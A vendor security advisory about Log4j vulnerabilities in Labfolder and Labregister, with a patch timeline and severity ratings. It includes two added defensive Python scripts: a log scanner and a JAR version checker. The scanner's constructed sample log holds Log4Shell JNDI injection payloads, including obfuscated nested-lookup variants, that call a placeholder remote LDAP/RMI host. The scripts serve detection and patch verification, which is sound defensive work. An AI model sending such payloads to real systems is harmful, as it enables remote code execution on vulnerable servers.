2021-12 Security update


Our commitment to Security and Privacy

Labforward is committed to achieving and maintaining the trust of our customers. Integral to this mission is that we always strive to provide robust security procedures and strictly adhere to the GDPR and our Privacy Policy. You can refer to our policy regarding security update disclosures here.

Summary

Labforward released several security updates for Labfolder and Labregister. These patches update the open-source logging library Apache Log4j to the versions recommended by the Apache Software Foundation. Applying these patches mitigates the vulnerabilities documented in:
  1. CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints.
  2. CVE-2021-45046: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
  3. CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation.

Timeline of issue handling

  • December 11th 2021
    • CVE-2021-44228 was escalated internally and immediately investigated by our engineering team.
    • Initial classification of Severity = Critical and Exploitability = Exploitation More Likely. Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    • We confirmed that Labfolder and Labregister use the open-source logging tool Log4j and that therefore we needed to take immediate action. Laboperator was not affected.
    • Recommended immediate mitigation step of disabling JNDI lookups was applied to our Cloud environments within 3 hours of the issue being escalated.
    • Later that evening, we informed all IT administrators of our On-Premises customers of the issue and requested that they apply the same mitigation steps as soon as possible. We also informed them that we will release a hotfix to upgrade the library.
  • December 12th 2021
    • Hotfix v2.12.1, upgrading Log4j to v2.15.0, released to our Cloud server.
    • Hotfix v2.11.2, upgrading Log4j to v2.15.0, released to On-Premises customers; installation instructions sent to IT administrators and marked as mandatory and urgent.
  • December 13th 2021
    • Further support of On-Premises customers upon request.
    • Further analysis of application logs showed, with a high degree of confidence, that no credible or successful attack had been made on the Labfolder / Labregister cloud application servers.
  • December 15th 2021
    • CVE-2021-45046 was escalated internally and immediately investigated by our engineering team.
    • Internal investigation showed that the Labfolder & Labregister codebase is highly unlikely to be vulnerable to this type of DoS attack; we nevertheless followed the recommended mitigation path and upgraded Log4j to v2.16.0.
    • Hotfix v2.12.2, upgrading Log4j to v2.16.0, released to our Cloud server.
    • Hotfix v2.11.3, upgrading Log4j to v2.16.0, released to On-Premises customers; installation instructions sent to IT administrators and marked as recommended.
  • December 20th 2021
    • CVE-2021-45105 was escalated internally and immediately investigated by our engineering team.
    • Internal investigation showed that the Labfolder & Labregister codebase is highly unlikely to be vulnerable; we nevertheless followed the recommended mitigation path and upgraded Log4j to v2.17.0.
    • Hotfix v2.12.4, upgrading Log4j to v2.17.0, released to our Cloud server.
    • Hotfix v2.11.4, upgrading Log4j to v2.17.0, released to On-Premises customers; installation instructions sent to IT administrators and marked as recommended.
  • December 30th 2021 – Publication of this Security Update
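The December 13th entry refers to an analysis of application logs. As an added example, not part of Labforward's update or its tooling, the following Python script shows the kind of check a defender runs over web-server access logs for this issue: it flags requests that carry a JNDI lookup string, and before matching it resolves nested Log4j lookups (lower, upper and the default-value form) so that a lookup which hides the keyword behind nesting is still caught. The log lines in SAMPLE_LOG are constructed, using RFC 5737 documentation addresses; the function names are my own.

```python
import re

# Constructed sample web-server access log (not from the page). Lines 1-3 carry
# JNDI lookup strings of the kind CVE-2021-44228 concerns, two of them hiding the
# keyword behind nested lookups; lines 4-5 are benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:08:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.5 - - [11/Dec/2021:08:14:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"
10.0.0.5 - - [11/Dec/2021:08:14:04 +0000] "GET /?q=${${::-j}ndi:rmi://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.79.1"
10.0.0.9 - - [11/Dec/2021:08:15:00 +0000] "GET /api/projects HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:08:15:01 +0000] "GET /docs/${version} HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# An innermost lookup: "${" ... "}" with no further "${" inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the nesting has been peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's string substitution would,
    for the cases that matter to detection; unknown lookups are left untouched."""
    body = match.group(1)
    if ":-" in body:                       # ${key:-default} -> default
        return body.split(":-", 1)[1]
    key, sep, arg = body.partition(":")
    if sep and key.strip().lower() == "lower":
        return arg.lower()
    if sep and key.strip().lower() == "upper":
        return arg.upper()
    return match.group(0)


def normalize(text, max_passes=20):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_passes):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(log_text):
    """Return (line number, normalized line) for every line containing a JNDI
    lookup, either literally or once nested lookups have been resolved."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        decoded = normalize(line)
        if JNDI.search(line) or JNDI.search(decoded):
            hits.append((lineno, decoded))
    return hits


if __name__ == "__main__":
    for lineno, decoded in scan(SAMPLE_LOG):
        print(f"line {lineno}: {decoded}")
```

A plain substring match on the keyword misses the nested forms, which is why the normalisation pass runs first; the script only reads text and opens no connections. Absence of hits in the web-server log is not proof of absence: the lookup string can arrive through any input the application itself logs, so the same scan should be applied to the application's own log files.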

Severity = What is the worst theoretical outcome?

Rating: Critical
Description: The vulnerability, when exploited, results in remote code execution on the vulnerable server with system-level privileges. As a result, it is rated at the highest possible severity level.

Exploitability = What is the likelihood that a vulnerability addressed in a security update will be exploited?

Rating: Exploitation More Likely
Description: Analysis by security researchers has shown that exploit code could be created in such a way that an attacker could consistently exploit this vulnerability. Moreover, since the public disclosure of this vulnerability, there have been several well-publicized instances of it being exploited in other software. Log4j is widely used by both enterprise applications and cloud services, as it is included in popular Java frameworks such as Apache Flink, Apache Druid and Apache Struts2. This makes it an attractive target for attackers, and therefore more likely that exploits will be created. As such, Labforward and the On-Premises customers of Labfolder should treat this with a higher priority.

General Recommendations

  • All users should always use the latest version of our recommended browsers (Chrome, Firefox, Edge and Safari). In addition, make sure to always update your operating system to the latest version, and have antivirus software in place to protect your devices and data.
  • IT admins of our On-Premises customers should update their systems as quickly as practical, especially when a new release includes a security patch.
  • IT admins of our On-Premises customers should keep the operating system and all components (e.g. Docker) of their on-prem servers up to date.
  • While our classification system is intended to provide a broadly objective assessment of each issue, we strongly encourage customers to evaluate their own environments and make decisions about which updates are required to protect their systems.
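For On-Premises administrators who want to confirm that a hotfix actually replaced the library, here is an added example (not Labforward's code, and not a description of how the Labfolder or Labregister installers work) that walks a directory, opens every .jar, .war and .ear, recurses into archives bundled inside them, and reports each Log4j core it finds against the v2.17.0 threshold from the timeline above. The archives inspected by demo() are constructed fixtures written to a temporary directory; the threshold assumes the main 2.x branch of Log4j.

```python
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

# Threshold from the page: the December 20th hotfixes bring Log4j to v2.17.0.
# Assumption: the main 2.x line is in use; the 2.12.x (Java 7) and 2.3.x (Java 6)
# branches have their own fixed releases and would need their own thresholds.
FIXED_VERSION = (2, 17, 0)

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
POM_RE = re.compile(r"^version=([0-9][0-9.]*)", re.M)
MANIFEST_RE = re.compile(r"^Implementation-Version:\s*([0-9][0-9.]*)", re.M | re.I)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text):
    return tuple(int(p) for p in text.strip().split(".") if p.isdigit())


def inspect_archive(src, label):
    """Report every log4j-core found in one archive, recursing into archives
    bundled inside it (WEB-INF/lib, fat JARs). `src` is a path or a file object."""
    findings = []
    with zipfile.ZipFile(src) as zf:
        names = set(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = None
            if POM_PROPS in names:            # Maven metadata is the most reliable source
                m = POM_RE.search(zf.read(POM_PROPS).decode("utf-8", "replace"))
                version = parse_version(m.group(1)) if m else None
            if version is None and "META-INF/MANIFEST.MF" in names:
                m = MANIFEST_RE.search(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
                version = parse_version(m.group(1)) if m else None
            if version is None:
                status = "unknown-version"
            elif version < FIXED_VERSION:
                status = "needs-upgrade"
            else:
                status = "patched"
            findings.append({"label": label, "version": version,
                             "jndi_lookup_class": JNDI_CLASS in names, "status": status})
        for n in names:                       # nested archives
            if n.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(inspect_archive(io.BytesIO(zf.read(n)), f"{label}!{n}"))
                except zipfile.BadZipFile:
                    pass
    return findings


def scan_tree(root):
    """Walk a directory (e.g. an extracted image or a mounted volume) for archives."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                findings.extend(inspect_archive(p, os.path.relpath(p, root)))
            except zipfile.BadZipFile:
                pass
    return findings


def make_sample_jar(dest, version):
    """Constructed stand-in for log4j-core-<version>.jar so the example runs
    offline; it is not a real Log4j build."""
    with zipfile.ZipFile(dest, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Build three constructed archives in a temp dir and return label -> status."""
    tmp = tempfile.mkdtemp(prefix="log4j-check-")
    make_sample_jar(os.path.join(tmp, "log4j-core-2.15.0.jar"), "2.15.0")
    make_sample_jar(os.path.join(tmp, "log4j-core-2.17.0.jar"), "2.17.0")
    inner = io.BytesIO()
    make_sample_jar(inner, "2.16.0")          # bundled inside a WAR, as in real deployments
    with zipfile.ZipFile(os.path.join(tmp, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", inner.getvalue())
    return {f["label"]: f["status"] for f in scan_tree(tmp)}


if __name__ == "__main__":
    for label, status in demo().items():
        print(f"{status:16} {label}")
```

Run scan_tree() against the directory where the application's images or volumes are extracted. Two caveats: the JndiLookup.class entry is still present in patched releases, so that field is informational rather than a verdict; and 2.15.0 and 2.16.0 are reported as needs-upgrade because they predate the December 20th hotfix, matching the sequence of upgrades in the timeline.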